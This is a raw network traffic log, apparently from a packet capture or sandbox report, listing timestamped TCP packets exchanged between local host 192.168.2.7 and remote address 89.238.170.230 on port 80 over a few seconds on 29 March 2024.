Mar 29, 2024 14:25:47.323374987 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:47.323419094 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:47.413815022 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:47.413872957 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:47.413945913 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:47.413990021 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:47.479729891 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:47.479744911 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:47.479757071 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:47.479769945 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:47.479784966 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:47.479801893 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:47.479832888 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:47.554843903 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:47.554904938 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:47.555119038 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:47.555169106 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:47.555175066 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:47.555211067 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:47.635516882 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:47.635531902 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:47.635612965 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:47.699095964 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:47.699172974 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:47.699210882 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:47.699224949 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:47.699249983 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:47.699270964 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:47.699315071 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:47.699353933 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:47.770627022 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:47.770648003 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:47.770700932 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:47.770726919 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:47.770890951 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:47.770929098 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:47.770934105 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:47.770972967 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:47.855899096 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:47.855999947 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:47.856023073 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:47.856043100 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:47.922211885 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:47.922303915 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:47.922486067 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:47.922498941 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:47.922529936 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:47.922595978 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:47.993151903 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:47.993201971 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:47.993263960 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:47.993280888 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:47.993294001 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:47.993335009 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:47.993339062 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:47.993397951 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:48.074862003 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:48.074913025 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:48.074940920 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:48.075001955 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:48.134563923 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:48.134578943 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:48.134654045 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:48.134654045 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:48.134783030 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:48.134833097 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:48.205073118 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:48.205159903 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:48.205281019 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:48.205293894 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:48.205346107 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:48.205427885 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:48.301608086 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:48.301630020 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:48.301750898 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:48.355202913 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:48.355226994 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:48.355240107 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:48.355252981 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:48.355389118 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:48.406765938 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:48.406831980 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:48.423932076 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:48.424000978 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:48.424009085 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:48.424050093 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:48.565351963 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:48.565371990 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:48.565388918 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:48.565416098 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:48.565433979 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:48.565447092 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:48.565486908 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:48.620583057 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:48.620661020 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:48.638314009 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:48.638329983 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:48.638364077 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:48.638379097 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:48.774827957 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:48.774878025 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:48.774893045 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:48.774899960 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:48.774905920 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:48.774915934 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:48.774957895 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:48.774961948 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:48.774991989 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:48.775000095 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:48.775031090 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:48.824675083 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:48.824743986 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:48.845484018 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:48.845499039 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:48.845551014 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:48.988210917 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:48.988239050 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:48.988251925 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:48.988301039 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:48.988301992 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:48.988301039 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:48.988327980 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:48.988351107 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:48.988377094 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:48.988414049 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:49.035525084 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:49.035541058 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:49.035603046 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:49.057903051 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:49.057965994 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:49.058008909 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:49.058048964 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:49.058063984 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:49.058095932 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:49.218662024 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:49.218750000 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:49.218955994 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:49.219000101 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:49.219055891 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:49.219099045 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:49.219109058 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:49.219145060 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:49.219175100 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:49.219213963 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:49.264866114 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:49.264889956 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:49.264923096 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:49.264946938 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:49.288889885 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:49.288943052 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:49.289216042 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:49.289232016 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:49.289267063 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:49.289298058 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:49.438857079 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:49.438935041 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:49.439116955 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:49.439136028 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:49.439167976 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:49.439186096 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:49.439270020 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:49.439310074 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:49.439320087 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:49.439359903 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:49.478221893 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:49.478401899 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:49.501971960 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:49.501988888 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:49.502034903 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:49.502048016 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:49.502252102 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:49.502289057 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:49.502296925 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:49.502325058 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:49.647944927 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:49.647974014 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:49.647994995 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:49.648014069 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:49.648031950 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:49.648031950 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:49.648066044 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:49.648092031 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:49.683307886 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:49.683372021 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:49.706221104 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:49.706283092 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:49.706615925 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:49.706677914 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:49.706695080 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:49.706727028 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:49.706861019 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:49.706899881 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:49.877556086 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:49.877588034 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:49.877609015 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:49.877630949 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:49.877640963 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:49.877665997 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:49.877695084 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:49.877707005 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:49.877743959 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:49.913117886 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:49.913209915 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:49.934448957 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:49.934551001 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:49.934797049 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:49.934813023 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:49.934829950 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:49.934861898 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:49.934896946 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:50.095902920 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:50.095952034 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:50.095992088 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:50.096072912 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:50.096502066 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:50.096515894 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:50.096560955 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:50.148535013 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:50.148549080 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:50.148602009 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:50.148614883 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:50.148628950 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:50.148705959 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:50.312182903 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:50.312247992 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:50.312273026 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:50.312316895 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:50.312330008 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:50.312371969 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:50.312416077 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:50.312454939 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:50.312479973 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:50.312516928 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:50.367625952 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:50.367645025 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:50.367657900 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:50.367671013 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:50.367706060 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:50.367739916 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:50.368093014 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:50.368149996 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:50.536331892 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:50.536402941 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:50.536643028 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:50.536690950 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:50.536731005 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:50.536772013 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:50.536947966 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:50.536989927 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:50.537075043 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:50.537113905 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:50.596669912 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:50.596765041 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:50.596806049 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:50.596852064 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:50.755784035 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:50.755803108 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:50.755863905 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:50.755901098 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:50.756211996 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:50.756266117 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:50.815001965 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:50.815054893 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:50.815083027 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:50.815123081 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:50.815277100 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:50.815316916 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:50.815356970 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:50.815404892 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:50.973066092 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:50.973081112 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:50.973135948 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:50.973135948 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:50.973162889 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:50.973177910 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:50.973206997 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:50.973247051 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:51.038630962 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:51.038695097 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:51.038760900 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:51.038810015 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:51.038863897 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:51.038902998 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:51.038938999 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:51.038988113 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:51.198796988 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:51.198820114 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:51.198832989 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:51.198882103 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:51.198884010 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:51.198932886 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:51.198940992 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:51.198985100 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:51.199029922 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:51.199071884 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:51.265639067 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:51.265711069 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:51.266148090 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:51.266174078 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:51.266196012 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:51.266216040 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:51.266254902 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:51.266294956 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:51.424736977 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:51.424796104 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:51.424855947 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:51.424870014 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:51.424917936 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:51.424917936 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:51.424928904 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:51.424961090 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:51.425050020 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:51.425064087 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:51.425097942 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:51.486605883 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:51.486627102 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:51.486805916 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:51.486893892 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:51.486913919 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:51.486973047 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:51.487015009 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:51.487077951 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:51.646234035 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:51.646486044 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:51.646508932 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:51.646581888 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:51.646785975 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:51.646800995 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:51.646882057 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:51.646923065 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:51.647025108 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:51.708345890 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:51.708430052 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:51.708481073 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:51.708530903 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:51.709301949 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:51.709352970 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:51.709491014 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:51.709538937 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:51.709558010 CET	80	49699	89.238.170.230	192.168.2.7
